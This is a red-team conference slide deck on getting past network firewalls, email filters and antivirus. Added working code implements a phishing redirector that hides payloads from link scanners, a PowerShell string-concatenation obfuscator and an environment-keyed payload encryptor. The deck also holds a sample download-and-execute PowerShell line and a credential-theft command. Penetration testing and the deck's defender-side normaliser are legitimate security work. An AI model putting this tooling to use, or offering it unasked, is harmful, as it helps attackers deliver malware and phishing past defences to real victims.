
Modern Evasion Techniques




  1. Modern Evasion Techniques, a.k.a. How to Concatenate Strings. Jason Lang, @curi0usJack
  2. Topics: Inline Control Workarounds (Palo Alto, Fortinet, Cisco) • NG Email Controls (Proofpoint, Mimecast) • Anti-Virus Evasion (most of them) • Payload Customization (PowerShell, macros, C#)
  3. Thank you: @Bandrel, @jarsnah12, @slobtresix0, @midnite_runr, the msf/empire devs
  4. About • 10+ years full-time InfoSec • Sr Consultant @ TrustedSec • Specialties: Active Directory, development (C#, Python, PowerShell) • Hobbies: woodworking, beekeeping, fly fishing. Jason Lang, @curi0usJack
  5. PAUSE
  6. blue harder
  7. Inline Controls • Defined: a network-layer control that performs real-time threat prevention • Two biggest contenders: Palo Alto, Fortinet • My testing was performed with a fully licensed, up-to-date Palo Alto, as well as a Cisco 5500 with FirePower
  8. Test Cases • Meterpreter (stock): windows/x64/meterpreter/reverse_https, default certificate, port 443 • Empire: Empire 2.1, default certificate, standard stager, port 443 • Pupy: obfs3 transport, defaults, port 443 • Custom Meterpreter: custom C# code, whatever I wanted • Victim machines: Windows 7/10 x64, Windows Defender
  9. Cisco Configuration • Rules: blocking all the things • SSL decryption: ON
  10. Cisco Configuration • https://www.cisco.com/c/en/us/td/docs/security/firepower/60/configuration/guide/fpmc-config-guide-v60/Access_Control_Using_Intrusion_and_File_Policies.html
  11. Cisco Configuration • MAX DETECTION MODE (screenshot)
  12. PA Configuration • Vulnerability Protection: everything set to reset-both • WildFire: ON • SSL Decryption
  13. Meterpreter Results • With SSL decryption: session opened/closed (screenshot) • Without SSL decryption (screenshot) • Results were the same for the custom C# Meterpreter.
  14. Pupy Results • With SSL decryption (screenshot) • Without SSL decryption (screenshot) • Win10 Defender (screenshot)
  15. Empire Lulz • A story in screenshots
  16. Empire Lulz • After running our launcher… (screenshot)
  17. Empire Lulz (screenshot)
  18. Empire Lulz • Nah… this shouldn't work… there's no way… • A minor server change: (screenshot)
  19. Empire Lulz (screenshot)
  20. Inline Evasions • If you must use msf, use auxiliary/gather/impersonate_ssl
  21. Inline Evasions (screenshot)
  22. Inline Evasions (screenshot)
  23. Inline Evasions • Pay attention to decryption/detection patterns • Favor Empire/Pupy over MSF if you are getting detected; change all defaults • Change your template** • Hope you're working with a Cisco firewall. ** https://www.blackhillsinfosec.com/modifying-metasploit-x64-template-for-av-evasion/
  24. Email Controls • Defined: anything that stops my phish from getting to the inbox • Examples: Proofpoint, Mimecast, Google spam filters
  25. Email Controls • Thanks to @CaseyCammilleri for all the shells!
  26. Email Controls (screenshot)
  27. Email Controls (screenshot)
  28. Email Controls (screenshot)
  29. Email Controls • Apache mod_rewrite to the rescue!
  30. Email Controls • Add to /etc/apache2/sites-enabled/000-default.conf (screenshot)
  31. Email Controls • Create /var/www/html/.htaccess (screenshot) • More red-team infrastructure guidance here: https://bluescreenofjeff.com/
  32. Email Controls (screenshot)
  33. Email Controls • Thanks for the tip @slobtresix0!
  34. Email Controls (screenshot)
  35. haha AV • https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10
  36. Email Controls • Shell from JOHNNYSPC (WildFire) (screenshot)
  37. Email Controls (screenshot)
  38. Email Controls (screenshot)
  39. Email Controls (screenshot)
  40. Email Controls (screenshot)
  41. Email Controls (screenshot)
  42. Email Controls (screenshot)
  43. Email Controls • Q: What if Google is blocking on the recipient's side?
  44. Email Controls • A: You forgot this: the correct SPF record for sending via O365 (screenshot)
  45. Email Workarounds
      1. Obfuscate your payload (generally the most basic will do)
      2. Set SPF/DKIM records
      3. Use links instead of attachments
      4. mod_rewrite is your friend
      5. Check the phish with isnotspam.com
      6. Don't trip threshold alerts: send targeted phish slowly
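A worked redirector for steps 3 and 4 above, added here as an example; it is not the configuration in the slides' screenshots. It assumes Apache 2.4 on Debian/Ubuntu with mod_rewrite, mod_proxy and mod_proxy_http enabled (a2enmod rewrite proxy proxy_http). The phish link path /docs/<12-character token>, the payload server on 127.0.0.1:8080 and the benign redirect target are made up for the example.

```apache
# --- /etc/apache2/sites-enabled/000-default.conf: inside <VirtualHost *:80> ---
# Let the per-directory .htaccess below take effect.
<Directory /var/www/html>
    Options -Indexes
    AllowOverride All
    Require all granted
</Directory>

# --- /var/www/html/.htaccess ---
RewriteEngine On

# Rule 1: the exact link from the phish, fetched by something that looks like a
# desktop browser, is proxied to the payload server (assumed on 127.0.0.1:8080).
RewriteCond %{REQUEST_URI} ^/docs/[A-Za-z0-9]{12}$
RewriteCond %{HTTP_USER_AGENT} "^Mozilla/5\.0 \((Windows NT|Macintosh)" [NC]
RewriteRule ^.*$ http://127.0.0.1:8080%{REQUEST_URI} [P,L]

# Rule 2: everything else (URL rewriters, link scanners, sandbox detonation,
# a reused or mistyped token) gets a 302 to a harmless site.
RewriteRule ^.*$ https://www.example.com/ [L,R=302]
```

Check both paths with curl before sending anything: a request to /docs/<token> with curl's default User-Agent should come back as a 302 to the benign site, and the same URL with -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' should reach the backend. The User-Agent condition is a weak gate, since link scanners can and do send browser User-Agents; burning a token after its first use needs a RewriteMap or a small script in front of the backend, which the slides do not cover.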
  46. Anti-Virus
  47. Anti-Virus • First things first: understand the current state • Test payloads against VirusTotal • Focused on the major players: Symantec, McAfee, Trend, Windows Defender, Cylance
  48. Anti-Virus • VirusTotal results:
      Type          Custom template  Args/Notes            Detections  Major player detects
      Binary (x86)  No               None                  51/64       Yes
      Binary (x64)  No               None                  41/64       Yes
      Binary (x64)  Yes              None                  16/62       Yes
      Binary (x64)  Yes              Custom C#             6/64        Yes (MS)
      Binary (x64)  Yes              C#, -e xor -i 4       3/64        Yes (MS)
      Binary (x64)  Yes              C#, -e zutto_dekiru   2/64        No
      PowerShell    No               Unicorn               1/56        No
      Binary (x64)  Yes              Ebowla                0/64        No
  49. AV Evasion #1 - Custom C# (1) • Receives msfvenom -f csharp output • Easily modified to suit needs • Basic exe detection: 6/64
  50. AV Evasion #1 - Custom C# (2) • Runs PowerShell code without powershell.exe
  51. Demo: C# Payload Generation
  52. AV Evasion #1 - Custom C# (2) (screenshot)
  53. AV Evasion #2 - PowerShell • AV vendors are simply searching for strings • Remove all comments • Change function names / parameter names • Concatenate your encoded commands
  54. AV Evasion #2 - PowerShell • powershell -W 1 -c ". .\Invoke-Minicars.ps1; Invoke-Minicars -GimmeCreds" • https://gist.github.com/curi0usJack/adbf34bd402f28138388bd6e266da961
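Slides 53 and 54 rest on one fact: a substring scanner cannot see through 'a'+'b', and the same fact tells a defender what to do about it. The block below is an added example, not the author's gist or any vendor's logic. It contains a small generator that rewrites a command into a concatenated PowerShell expression, a naive substring scanner standing in for the vendor string matches the slide describes, and a normaliser that folds the literals back together so the scanner matches again. The sample command, the signature list and every function name are constructed for the example.

```python
import random
import re

# Constructed sample launcher line (harmless: the host is .invalid). What matters
# is that it carries the strings a substring-based scanner would key on.
SAMPLE_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"

# Toy signature list standing in for the vendor string matches the slide describes.
SIGNATURES = ["DownloadString", "New-Object Net.WebClient", "IEX"]


def concat_obfuscate(text, min_chunk=1, max_chunk=2, seed=None):
    """Emit a PowerShell expression that rebuilds `text` with '+' at run time.

    Chunks must be shorter than the shortest string you want to break, otherwise
    one chunk can still carry a whole signature. A single quote inside a chunk is
    doubled, which is PowerShell's escape inside a single-quoted literal.
    """
    rng = random.Random(seed)
    chunks, i = [], 0
    while i < len(text):
        n = rng.randint(min_chunk, max_chunk)
        chunks.append(text[i:i + n])
        i += n
    return "(" + "+".join("'" + c.replace("'", "''") + "'" for c in chunks) + ")"


def scanner_hits(text, signatures=SIGNATURES):
    """Naive substring scanner: the behaviour the slide attributes to AV."""
    return [s for s in signatures if s in text]


# One single-quoted PowerShell literal; '' inside it is an escaped quote.
_LIT = r"'((?:[^']|'')*)'"
_PAIR = re.compile(_LIT + r"\s*\+\s*" + _LIT)


def normalize_concat(text):
    """Detection-side counterpart: fold 'a'+'b' chains back into one literal
    before matching, so the scanner sees what the interpreter will see."""
    prev = None
    while prev != text:
        prev = text
        text = _PAIR.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
    return text


def deobfuscate(expr):
    """Recover the plain string from a concatenation-only expression."""
    merged = normalize_concat(expr).strip()
    if merged.startswith("(") and merged.endswith(")"):
        merged = merged[1:-1].strip()
    if len(merged) >= 2 and merged[0] == merged[-1] == "'":
        return merged[1:-1].replace("''", "'")
    return merged


if __name__ == "__main__":
    expr = concat_obfuscate(SAMPLE_COMMAND, seed=7)
    print(expr)
    print("raw scanner hits:    ", scanner_hits(expr))
    print("after normalisation: ", scanner_hits(deobfuscate(expr)))
```

Real launchers also go through -EncodedCommand, renamed functions and the other steps on slide 53; the normaliser here handles only the concatenation layer, which is the point: every layer of obfuscation needs its own normalisation pass on the defender's side, and a scanner that matches raw strings never gets there.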
  55. AV Evasion #3 - Ebowla • Encrypts payload with a target environment variable • Self-decrypts on execution • Basic exe detection: 0/64 • https://github.com/Genetic-Malware/Ebowla
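Environmental keying, as slide 55 describes it for Ebowla, written out as an added example in Python with only the standard library. This is not Ebowla's code (Ebowla uses AES and several key sources); here the key is derived with PBKDF2 from a single environment variable and the cipher is an HMAC-SHA256 counter-mode keystream, both chosen so the example runs anywhere. The payload bytes, the user name and the variable name are constructed.

```python
import hashlib
import hmac
import os

# Constructed stand-in for a payload. Any bytes work; nothing here is executed.
SAMPLE_PAYLOAD = b"constructed payload bytes, not real shellcode"


def derive_key(env_value, salt):
    """Key material comes only from the target's environment value (for example
    the USERNAME the phish was aimed at). The PBKDF2 cost makes guessing that
    value offline expensive for whoever captures the binary."""
    return hashlib.pbkdf2_hmac("sha256", env_value.encode("utf-8"), salt, 100_000, dklen=32)


def _keystream(key, length):
    """HMAC-SHA256 in counter mode; a stand-in for a real cipher so the example
    needs only the standard library. Safe here because each key is single-use
    (fresh salt per seal)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def seal(payload, env_value, salt=None):
    """Return salt || tag || ciphertext. The tag lets the loader tell 'wrong
    environment' from 'right environment' without revealing anything else."""
    salt = os.urandom(16) if salt is None else salt
    key = derive_key(env_value, salt)
    ct = bytes(a ^ b for a, b in zip(payload, _keystream(key, len(payload))))
    tag = hmac.new(key, salt + ct, hashlib.sha256).digest()
    return salt + tag + ct


def unseal(blob, env_value):
    """Decrypt only if the environment value is the one the payload was keyed to;
    otherwise return None. A sandbox detonating under another user sees noise."""
    salt, tag, ct = blob[:16], blob[16:48], blob[48:]
    key = derive_key(env_value, salt)
    expected = hmac.new(key, salt + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, len(ct))))


def unseal_from_environment(blob, variable="USERNAME"):
    """What the self-decrypting stub does at run time: read the variable, try."""
    return unseal(blob, os.environ.get(variable, ""))


if __name__ == "__main__":
    blob = seal(SAMPLE_PAYLOAD, "jsmith")
    print("right user:", unseal(blob, "jsmith"))
    print("wrong user:", unseal(blob, "sandbox"))
```

For the blue side the consequence is the same as on the slide: a sample recovered from a mail gateway or a sandbox holds the salt, the tag and the ciphertext but not the key, so static scanning sees only ciphertext (hence the 0/64), and the only route to the plaintext is knowing or guessing the environment value the operator keyed it to.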
  56. Demo: Chaining it together • Payload Gen -> Evasion -> Delivery Vehicle
  57. Tools
      1. MSF/Empire - you should know where these are at. =)
      2. Pupy - https://github.com/n1nj4sec/pupy
      3. Unicorn - https://github.com/trustedsec/unicorn
      4. Ebowla - https://github.com/Genetic-Malware/Ebowla
      5. Luckystrike - https://github.com/curi0usJack/luckystrike
      6. C# Demo Extras
         1. https://github.com/curi0usJack/psfire
         2. https://github.com/curi0usJack/custompayload
  58. Thank you! =)
